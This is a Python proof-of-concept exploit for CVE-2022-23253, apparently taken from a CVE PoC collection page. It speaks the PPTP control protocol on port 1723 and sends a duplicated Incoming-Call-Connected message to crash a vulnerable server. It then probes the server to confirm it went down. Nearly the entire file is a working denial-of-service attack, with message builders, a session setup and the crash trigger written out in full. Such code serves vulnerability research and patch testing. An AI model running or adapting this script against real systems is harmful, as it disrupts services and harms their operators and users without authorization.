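# NOTE: the following lines are residue from the web page this file was copied
# from; they are kept as comments so the module parses as Python.
# 4837 Total CVEs
# 26 Years
# GitHub
# README.md
# Rendering markdown...
# POC / CVE-2022-23253.py PY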

import socket
import select
import secrets
import struct 
import argparse

# Default TCP port used for the control connection.
CTL_PORT = 1723
# Address of the server to talk to; empty until it is configured at runtime.
TEST_SERVER = ""

# Control message type codes (written into the header's message-type field)
gStartControlConnectionRequest = 1
gStartControlConnectionReply = 2
gIncomingCallRequest = 9
gIncomingCallReply = 10
gIncomingCallConnected = 11

# Framing capabilities (the message classes pack these as 32-bit fields)
gAsynchronousFraming = 0x00000001
gSynchronousFraming = 0x00000002

# Bearer capabilities (the message classes pack these as 32-bit fields)
gAnalogAccessSupported = 0x00000001
gDigitalAccessSupported = 0x00000002

class CtlClient():
    """Small TCP client used to exchange control messages with a server.

    Attributes:
        IP: Host name or address passed to ``socket.connect``.
        Port: TCP port passed to ``socket.connect``.
        Socket: The connected socket, or ``None`` while disconnected.
        IsConnected: ``True`` between a successful ``CtlConnect`` and
            ``CtlCloseConn``.
    """

    # Largest number of bytes requested from the socket per recv() call.
    RECV_CHUNK = 1024

    def __init__(self, serverIp, serverPort=None):
        """Store the target endpoint; no network activity happens here.

        Args:
            serverIp: Host name or IP address of the server.
            serverPort: TCP port of the control channel. When omitted, the
                module-level ``CTL_PORT`` is read at call time, so a value
                assigned to it after import is honoured (a default bound in
                the signature would be frozen at class-definition time).
        """
        self.IP = serverIp
        self.Port = CTL_PORT if serverPort is None else serverPort

        self.Socket = None
        self.IsConnected = False

    def CtlCloseConn(self):
        """Close the socket if one is open and mark the client disconnected.

        Safe to call repeatedly or before any connection was made.
        """
        if self.Socket is not None:
            self.Socket.close()
            self.Socket = None
        self.IsConnected = False

    def CtlSendMsg(self, CtlMessage, multiplier=1):
        """Serialize one message and send it, optionally repeated.

        Args:
            CtlMessage: Object whose ``build()`` returns the bytes to send.
            multiplier: Number of back-to-back copies placed in the buffer.

        Raises:
            RuntimeError: If the client is not connected.
        """
        if not self.IsConnected:
            raise RuntimeError("Attempted to send Ctl data on unconnected client")

        ctlmsgbuf: bytes = CtlMessage.build() * multiplier

        # sendall() keeps writing until the whole buffer is out; a plain
        # send() may transmit only a prefix and silently drop the rest.
        self.Socket.sendall(ctlmsgbuf)

    def CtlMultiSendMsg(self, CtlMessageArray):
        """Serialize several messages and send them as one buffer.

        Args:
            CtlMessageArray: Iterable of objects exposing ``build()``.

        Raises:
            RuntimeError: If the client is not connected.
        """
        if not self.IsConnected:
            raise RuntimeError("Attempted to send Ctl data on unconnected client")

        sendBuffer = b"".join(CtlMsg.build() for CtlMsg in CtlMessageArray)
        self.Socket.sendall(sendBuffer)

    def CtlRecvMsg(self, timeout=1):
        """Read whatever the server sends within ``timeout`` seconds.

        Args:
            timeout: Seconds to wait for the socket to become readable
                before each read.

        Returns:
            The received bytes, or ``b""`` when nothing arrived in time or
            the peer closed the connection.

        Raises:
            RuntimeError: If no socket has been opened yet.
        """
        if self.Socket is None:
            raise RuntimeError("Attempted to receive Ctl data on unconnected client")

        chunks = []
        # Poll before every recv(): a reply that is an exact multiple of the
        # chunk size would otherwise leave us blocked in recv() waiting for
        # bytes that never come.
        while select.select([self.Socket], [], [], timeout)[0]:
            chunk = self.Socket.recv(self.RECV_CHUNK)
            chunks.append(chunk)
            if len(chunk) < self.RECV_CHUNK:
                # Short (or empty) read: nothing more is pending right now.
                break

        return b"".join(chunks)

    def CtlConnect(self, timeout=None):
        """Open a TCP connection to ``(IP, Port)``.

        Args:
            timeout: Optional socket timeout in seconds; a falsy value leaves
                the socket in its default blocking mode.

        Raises:
            OSError: If the connection attempt fails or times out.
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            if timeout:
                sock.settimeout(timeout)
            sock.connect((self.IP, self.Port))
        except BaseException:
            # Do not leak the descriptor when the connect attempt fails.
            sock.close()
            raise

        self.Socket = sock
        self.IsConnected = True
    
class ControlMessage():
    """The 12-byte header that starts every control message.

    The header is five big-endian fields: message length (16 bit), PPTP
    message type (16 bit), magic number (32 bit), control message type
    (16 bit) and a reserved word (16 bit).

    Attributes:
        MessageLength: Value written to / read from the length field.
        PptpMessageType: Value of the PPTP message type field.
        CtlMagic: Value of the magic number field.
        CtlMessageType: Value of the control message type field.
        Reserved0: Value of the reserved field.
        SetSize: When truthy, ``build()`` overwrites ``MessageLength`` with
            the class's ``SIZE`` constant.
    """

    SIZE = 0xC # 12 byte header
    _HEADER = struct.Struct(">HHIHH")

    def __init__(self, messageType, messageLength, setSize=False, packetBytes=None):
        """Create a header for sending, or parse one from received bytes.

        Args:
            messageType: Control message type for an outgoing message.
            messageLength: Length field value for an outgoing message.
            setSize: If true, ``build()`` uses ``SIZE`` as the length field.
            packetBytes: Received bytes to parse. When given (even if empty)
                the other arguments are ignored.

        Raises:
            ValueError: If ``packetBytes`` is shorter than the header.
        """
        # ``is not None`` so that an empty receive buffer is reported as a
        # malformed packet instead of silently yielding an outgoing header.
        if packetBytes is not None:
            self.SetSize = 0
            self.__fromBytes(packetBytes)
        else:
            self.MessageLength = messageLength
            self.PptpMessageType = 0x1
            #Magic number
            self.CtlMagic = 0x1A2B3C4D
            self.CtlMessageType = messageType
            self.Reserved0 = 0
            self.SetSize = setSize

    def build(self):
        """Return the serialized 12-byte header.

        Returns:
            The header as ``bytes``.

        Raises:
            struct.error: If a field does not fit its wire width.
        """
        if self.SetSize:
            # Use the preconfigured set size for this packet. The attribute
            # must be spelled ``SIZE``: ``__SIZE`` is name-mangled inside the
            # class body and never existed.
            # NOTE(review): for a subclass this is that subclass's SIZE;
            # confirm whether the header length should be added to it.
            self.MessageLength = self.SIZE
        return self._HEADER.pack(
            self.MessageLength,
            self.PptpMessageType,
            self.CtlMagic,
            self.CtlMessageType,
            self.Reserved0,
        )

    def __fromBytes(self, bytebuffer):
        """Populate the header fields from the first 12 bytes of a packet.

        Raises:
            ValueError: If fewer than 12 bytes are available.
        """
        if len(bytebuffer) < self._HEADER.size:
            raise ValueError(
                "Control message too short: got {} bytes, need at least {}".format(
                    len(bytebuffer), self._HEADER.size
                )
            )
        (
            self.MessageLength,
            self.PptpMessageType,
            self.CtlMagic,
            self.CtlMessageType,
            self.Reserved0,
        ) = self._HEADER.unpack_from(bytebuffer, 0)

class StartControlConnectionRequest(ControlMessage):
    """Outgoing Start-Control-Connection-Request message.

    The body is: protocol version (16 bit), reserved (16 bit), framing
    capabilities (32 bit), bearer capabilities (32 bit), maximum channels
    (16 bit), firmware revision (16 bit), then the host name and vendor
    string appended as given.
    """

    SIZE = 0x90

    def __init__(self, framing=gAsynchronousFraming, bearer=gAnalogAccessSupported, maxChannels=0x0, firmwareRevision=0x0, hostName=b"A" * 64, vendorString=b"B" * 64):
        """Fill in the header and body fields.

        Args:
            framing: Framing capabilities field.
            bearer: Bearer capabilities field.
            maxChannels: Maximum channels field.
            firmwareRevision: Firmware revision field.
            hostName: Bytes appended as the host name (64 bytes by default).
            vendorString: Bytes appended as the vendor string (64 bytes by
                default).
        """
        declared_length = ControlMessage.SIZE + StartControlConnectionRequest.SIZE
        super().__init__(gStartControlConnectionRequest, declared_length)

        self.protocolVersion = 0x100
        self.Reserved1 = 0
        self.FramingCapabilities = framing
        self.BearerCapabilities = bearer
        self.MaxChannels = maxChannels
        self.FirmwareRevision = firmwareRevision
        # The two string fields are sent exactly as supplied.
        self.HostName = hostName
        self.VendorString = vendorString

    def build(self):
        """Return the serialized message: header followed by the body."""
        header = super().build()
        fixed_fields = struct.pack(
            ">HHIIHH",
            self.protocolVersion,
            self.Reserved1,
            self.FramingCapabilities,
            self.BearerCapabilities,
            self.MaxChannels,
            self.FirmwareRevision,
        )
        return header + (fixed_fields + self.HostName + self.VendorString)

class StartControlConnectionReply(ControlMessage):
    """Start-Control-Connection-Reply message, built locally or parsed.

    The body is: protocol version (16 bit), result code (8 bit), error code
    (8 bit), framing capabilities (32 bit), bearer capabilities (32 bit),
    maximum channels (16 bit), firmware revision (16 bit), host name
    (64 bytes) and vendor string (64 bytes).
    """

    SIZE = 0x90
    # Width of each of the two trailing string fields.
    _STRING_FIELD_LEN = 64

    def __init__(self, framing=gAsynchronousFraming, bearer=gAnalogAccessSupported, maxChannels=0x0, firmwareRevision=0x0, hostName=b"A" * 64, vendorString=b"B" * 64, resultCode=0, errorCode=0, packetBytes=None):
        """Build a reply from field values, or parse one from ``packetBytes``.

        Args:
            framing: Framing capabilities field.
            bearer: Bearer capabilities field.
            maxChannels: Maximum channels field.
            firmwareRevision: Firmware revision field.
            hostName: Bytes used as the host name field.
            vendorString: Bytes used as the vendor string field.
            resultCode: Result code field.
            errorCode: Error code field.
            packetBytes: Received bytes to parse; when given, the field
                arguments above are ignored.

        Raises:
            ValueError: If ``packetBytes`` is too short to hold the
                fixed-width body fields.
        """
        # Use this class's own SIZE rather than the request's (same value).
        super().__init__(gStartControlConnectionReply, ControlMessage.SIZE + StartControlConnectionReply.SIZE, packetBytes=packetBytes)
        if packetBytes is not None:
            self.__fromBytes(packetBytes)
        else:
            self.protocolVersion = 0x100
            self.ResultCode = resultCode
            self.ErrorCode = errorCode
            self.FramingCapabilities = framing
            self.BearerCapabilities = bearer
            self.MaxChannels = maxChannels
            self.FirmwareRevision = firmwareRevision
            self.HostName = hostName # 64 byte host name string
            self.VendorString = vendorString # 64 byte vendor string

    def build(self):
        """Return the serialized message: header followed by the body."""
        header = super().build()
        fixed_fields = struct.pack(
            ">HBBIIHH",
            self.protocolVersion,
            self.ResultCode,
            self.ErrorCode,
            self.FramingCapabilities,
            self.BearerCapabilities,
            self.MaxChannels,
            self.FirmwareRevision,
        )
        return header + fixed_fields + self.HostName + self.VendorString

    def __fromBytes(self, bytebuffer):
        """Populate the body fields from a received packet.

        The string fields are stored as bytes so that a parsed reply can be
        passed back through ``build()``; they are shorter than 64 bytes (or
        empty) when the packet ends early.

        Raises:
            ValueError: If the fixed-width fields are not fully present.
        """
        fixed = struct.Struct(">HBBIIHH")
        offset = ControlMessage.SIZE
        if len(bytebuffer) < offset + fixed.size:
            raise ValueError(
                "Start-Control-Connection-Reply too short: got {} bytes, need at least {}".format(
                    len(bytebuffer), offset + fixed.size
                )
            )
        (
            self.protocolVersion,
            self.ResultCode,
            self.ErrorCode,
            self.FramingCapabilities,
            self.BearerCapabilities,
            self.MaxChannels,
            self.FirmwareRevision,
        ) = fixed.unpack_from(bytebuffer, offset)

        host_start = offset + fixed.size
        vendor_start = host_start + self._STRING_FIELD_LEN
        self.HostName = bytes(bytebuffer[host_start:vendor_start])
        self.VendorString = bytes(bytebuffer[vendor_start:vendor_start + self._STRING_FIELD_LEN])


class IncomingCallRequest(ControlMessage):
    """Outgoing Incoming-Call-Request message.

    The body is: call ID (16 bit), call serial number (16 bit), call bearer
    type (32 bit), physical channel ID (32 bit), dialed number length
    (16 bit), dialing number length (16 bit), then the dialed number,
    dialing number and subaddress appended as given.
    """

    SIZE = 0xD0

    def __init__(
        self,
        CallId=1337,
        CallSerialNumber=1338,
        CallBearerType=gAnalogAccessSupported,
        PhysicalChannelId=0,
        DialedNumberLength=64,
        DialingNumberLength=64,
        DialedNumber=64 * b"A",
        DialingNumber=64 * b"B",
        Subaddress=64 * b"C",
        packetBytes=None,
    ):
        """Fill in the header and body fields.

        ``packetBytes`` is only forwarded to the base class; the body fields
        below are always taken from the keyword arguments.
        """
        declared_length = IncomingCallRequest.SIZE + ControlMessage.SIZE
        super().__init__(gIncomingCallRequest, declared_length, packetBytes=packetBytes)

        # Fixed-width fields
        self.CallId = CallId
        self.CallSerialNumber = CallSerialNumber
        self.CallBearerType = CallBearerType
        self.PhysicalChannelId = PhysicalChannelId
        self.DialedNumberLength = DialedNumberLength
        self.DialingNumberLength = DialingNumberLength
        # Byte-string fields, sent exactly as supplied
        self.DialedNumber = DialedNumber
        self.DialingNumber = DialingNumber
        self.Subaddress = Subaddress

    def build(self):
        """Return the serialized message: header followed by the body."""
        header = super().build()
        fixed_fields = struct.pack(
            ">HHIIHH",
            self.CallId,
            self.CallSerialNumber,
            self.CallBearerType,
            self.PhysicalChannelId,
            self.DialedNumberLength,
            self.DialingNumberLength,
        )
        body = fixed_fields + self.DialedNumber + self.DialingNumber + self.Subaddress
        return header + body

class IncomingCallReply(ControlMessage):
    """Incoming-Call-Reply message, built locally or parsed from bytes.

    The body is: call ID (16 bit), peer's call ID (16 bit), result code
    (8 bit), error code (8 bit), packet receive window size (16 bit),
    packet transit delay (16 bit) and a reserved word (16 bit).
    """

    SIZE = 0xC

    def __init__(self,CallId=0x1337, PeersCallId=0x1338, ResultCode=1, ErrorCode=0, PacketRecvWindowSize=64, PacketTransitDelay=32, packetBytes=None):
        """Build a reply from field values, or parse one from ``packetBytes``.

        Args:
            CallId: Call ID field.
            PeersCallId: Peer's call ID field.
            ResultCode: Result code field.
            ErrorCode: Error code field.
            PacketRecvWindowSize: Packet receive window size field.
            PacketTransitDelay: Packet transit delay field.
            packetBytes: Received bytes to parse; when given, the field
                arguments above are ignored.

        Raises:
            ValueError: If ``packetBytes`` is too short to hold the body.
        """
        super().__init__(gIncomingCallReply, IncomingCallReply.SIZE + ControlMessage.SIZE, packetBytes=packetBytes)
        # ``is not None`` so an empty receive buffer is rejected by
        # fromBytes() instead of yielding the default "success" reply.
        if packetBytes is not None:
            self.fromBytes(packetBytes)
        else:
            self.CallId = CallId
            self.PeersCallId = PeersCallId
            self.ResultCode = ResultCode
            self.ErrorCode = ErrorCode
            # Plain int: a trailing comma here would store a 1-tuple and make
            # build() fail in struct.pack.
            self.PacketRecvWindowSize = PacketRecvWindowSize
            self.PacketTransitDelay = PacketTransitDelay
            self.Reserved1 = 0

    def build(self):
        """Return the serialized message: header followed by the body."""
        header = super().build()
        body = struct.pack(
            ">HHBBHHH",
            self.CallId,
            self.PeersCallId,
            self.ResultCode,
            self.ErrorCode,
            self.PacketRecvWindowSize,
            self.PacketTransitDelay,
            self.Reserved1,
        )
        return header + body

    def fromBytes(self, bytebuffer):
        """Populate the body fields from a received packet.

        Raises:
            ValueError: If the packet does not contain the full body.
        """
        body = struct.Struct(">HHBBHHH")
        needed = ControlMessage.SIZE + body.size
        if len(bytebuffer) < needed:
            raise ValueError(
                "Incoming-Call-Reply too short: got {} bytes, need at least {}".format(
                    len(bytebuffer), needed
                )
            )
        (
            self.CallId,
            self.PeersCallId,
            self.ResultCode,
            self.ErrorCode,
            self.PacketRecvWindowSize,
            self.PacketTransitDelay,
            self.Reserved1,
        ) = body.unpack_from(bytebuffer, ControlMessage.SIZE)

class IncomingCallConnected(ControlMessage):
    """Incoming-Call-Connected message, built locally or parsed from bytes.

    The body is: peer's call ID (16 bit), reserved (16 bit), connect speed
    (32 bit), packet receive window size (16 bit), packet transmit delay
    (16 bit) and framing type (32 bit).
    """

    SIZE = 0x10

    def __init__(self,PeerCallId=1337, ConnectSpeed=1, PacketRecvWindowsSize=64, PacketTransmitDelay=0, FramingType = gAsynchronousFraming, packetBytes=None):
        """Build a message from field values, or parse one from ``packetBytes``.

        Args:
            PeerCallId: Peer's call ID field.
            ConnectSpeed: Connect speed field.
            PacketRecvWindowsSize: Packet receive window size field.
            PacketTransmitDelay: Packet transmit delay field.
            FramingType: Framing type field.
            packetBytes: Received bytes to parse; when given, the field
                arguments above are ignored.

        Raises:
            ValueError: If ``packetBytes`` is too short to hold the body.
        """
        super().__init__(gIncomingCallConnected, IncomingCallConnected.SIZE + ControlMessage.SIZE, packetBytes=packetBytes)

        if packetBytes is not None:
            # Parse the body so a received message has the same attributes
            # as a locally built one and can be passed to build().
            self.fromBytes(packetBytes)
        else:
            self.PeerCallId = PeerCallId
            self.Reserved1 = 0
            self.ConnectSpeed = ConnectSpeed
            self.PacketRecvWindowSize = PacketRecvWindowsSize
            self.PacketTransmitDelay = PacketTransmitDelay
            self.FramingType = FramingType

    def build(self):
        """Return the serialized message: header followed by the body."""
        header = super().build()
        body = struct.pack(
            ">HHIHHI",
            self.PeerCallId,
            self.Reserved1,
            self.ConnectSpeed,
            self.PacketRecvWindowSize,
            self.PacketTransmitDelay,
            self.FramingType,
        )
        return header + body

    def fromBytes(self, bytebuffer):
        """Populate the body fields from a received packet.

        Raises:
            ValueError: If the packet does not contain the full body.
        """
        body = struct.Struct(">HHIHHI")
        needed = ControlMessage.SIZE + body.size
        if len(bytebuffer) < needed:
            raise ValueError(
                "Incoming-Call-Connected too short: got {} bytes, need at least {}".format(
                    len(bytebuffer), needed
                )
            )
        (
            self.PeerCallId,
            self.Reserved1,
            self.ConnectSpeed,
            self.PacketRecvWindowSize,
            self.PacketTransmitDelay,
            self.FramingType,
        ) = body.unpack_from(bytebuffer, ControlMessage.SIZE)

def startControlSession():
    """Connect to TEST_SERVER and complete the start-control-connection exchange.

    Sends a StartControlConnectionRequest and parses the server's answer as
    a StartControlConnectionReply.

    Returns:
        The connected CtlClient, ready for further control messages.

    Raises:
        ValueError: If the reply carries a non-zero error code or a result
            code other than 1.
        OSError: If the TCP connection cannot be established.
    """
    # Pass the port explicitly so a CTL_PORT value configured at runtime is
    # the one actually used for the connection.
    pocClient = CtlClient(TEST_SERVER, CTL_PORT)
    try:
        pocClient.CtlConnect()
        pocClient.CtlSendMsg(StartControlConnectionRequest())
        StartControlReply_raw = pocClient.CtlRecvMsg()
        initializeCtlResponse = StartControlConnectionReply(packetBytes=StartControlReply_raw)

        if initializeCtlResponse.ErrorCode != 0 or initializeCtlResponse.ResultCode != 1:
            raise ValueError("[:(] PoC Failed unexpectadly due to server side error, investigation reqiured....")
    except Exception:
        # The caller never receives the client on failure, so release the
        # socket here before propagating the error.
        if pocClient.Socket is not None:
            pocClient.CtlCloseConn()
        raise

    return pocClient

def poke_server():
    """Report whether a new TCP connection to the target can be opened.

    Attempts a connection to TEST_SERVER with a one-second timeout and
    prints the outcome; nothing is returned.
    """
    print("[+] Pokeing the target....")
    # Pass the port explicitly so a CTL_PORT value configured at runtime is
    # the one actually probed.
    poke_client = CtlClient(TEST_SERVER, CTL_PORT)
    try:
        poke_client.CtlConnect(timeout=1)
    except OSError:
        # Refused connections, timeouts and resolution failures are all
        # OSError subclasses; other exceptions indicate a bug and propagate
        # instead of being reported as a dead server.
        print("[+] Yep, its dead")
    else:
        print("[-] Its alive!?")
    finally:
        # The probe connection is not needed afterwards; do not leak it.
        if poke_client.Socket is not None:
            poke_client.CtlCloseConn()

def trigger_cve_2022_23253():
    """Run the message sequence of this PoC against the configured server.

    Steps, in order:
      1. Open a control session via startControlSession().
      2. Send an IncomingCallRequest with a random call ID and serial number.
      3. Parse the answer as an IncomingCallReply and check its result and
         error codes.
      4. Send the same IncomingCallConnected message twice.
      5. Call poke_server() to see whether the server still accepts
         connections.

    Raises:
        ValueError: If the incoming-call reply has a result code other than
            1 or a non-zero error code (or if startControlSession() fails).
    """
    print("[+] Starting PPTP control connection")
    
    pocClient = startControlSession()
    # Both identifiers are packed as 16-bit fields, hence the 0x10000 bound.
    newCallId = secrets.randbelow(0x10000)
    newCallSerial = secrets.randbelow(0x10000)
    newIncomingCall = IncomingCallRequest(CallId=newCallId,CallSerialNumber=newCallSerial) #Requests Causing Issues
    print("[+] Creating new incoming call")
    pocClient.CtlSendMsg(newIncomingCall)
    
    # NOTE(review): CtlRecvMsg() returns b"" when nothing arrives in time;
    # confirm how IncomingCallReply treats an empty buffer.
    ICReply_raw = pocClient.CtlRecvMsg()
    newIncomingCallReply = IncomingCallReply(packetBytes=ICReply_raw)
    print("[+] Incoming call reply received with call ID {}".format(newIncomingCallReply.CallId))
    if newIncomingCallReply.ResultCode != 1 or newIncomingCallReply.ErrorCode != 0:
        raise ValueError("[:(] PoC failed unexpecadle due to server side error... ")

    # Positional arguments: PeerCallId, ConnectSpeed, PacketRecvWindowsSize,
    # PacketTransmitDelay - the call ID and window/delay values are echoed
    # from the server's reply.
    newIncomingCallConnected = IncomingCallConnected(newIncomingCallReply.CallId, 64, newIncomingCallReply.PacketRecvWindowSize, newIncomingCallReply.PacketTransitDelay)
    print("[+] Triggering Bug!")
    # The identical message is deliberately sent twice for the same call.
    pocClient.CtlSendMsg(newIncomingCallConnected)
    pocClient.CtlSendMsg(newIncomingCallConnected)

    # NOTE(review): pocClient is never closed in this function.
    print("[+] Machine should be dead now, lets check!")
    poke_server()

def main():
    """Parse the command line, ask for confirmation, then run the PoC.

    ``--ip`` (required) and ``--port`` (defaults to the current CTL_PORT)
    are stored in the module globals TEST_SERVER and CTL_PORT. The PoC only
    runs when the user answers "y" (case-insensitive) to the prompt.
    """
    global TEST_SERVER
    global CTL_PORT

    cli = argparse.ArgumentParser(description="PoC for CVE-2022-23253!")
    cli.add_argument(
        '--ip',
        type=str,
        required=True,
        dest="ip_address",
        help="IP address of the target server",
    )
    port_help = "Port of the PPTP CTL TCP socket, should remain as {} in most cases.".format(CTL_PORT)
    cli.add_argument(
        '--port',
        type=int,
        default=CTL_PORT,
        dest="ctl_port",
        help=port_help,
    )
    options = cli.parse_args()

    TEST_SERVER = options.ip_address
    CTL_PORT = options.ctl_port

    answer = input("[?] This PoC will crash a vulnerable server, do you want to continue [y/n]: ")

    # Anything other than an explicit "y" aborts.
    if answer.lower() != "y":
        print("[+] GoodBye!")
        return

    print("[+] Triggering Bug!")
    trigger_cve_2022_23253()

# Run main() only when the file is executed as a script, not when imported.
if __name__ == '__main__':
    main()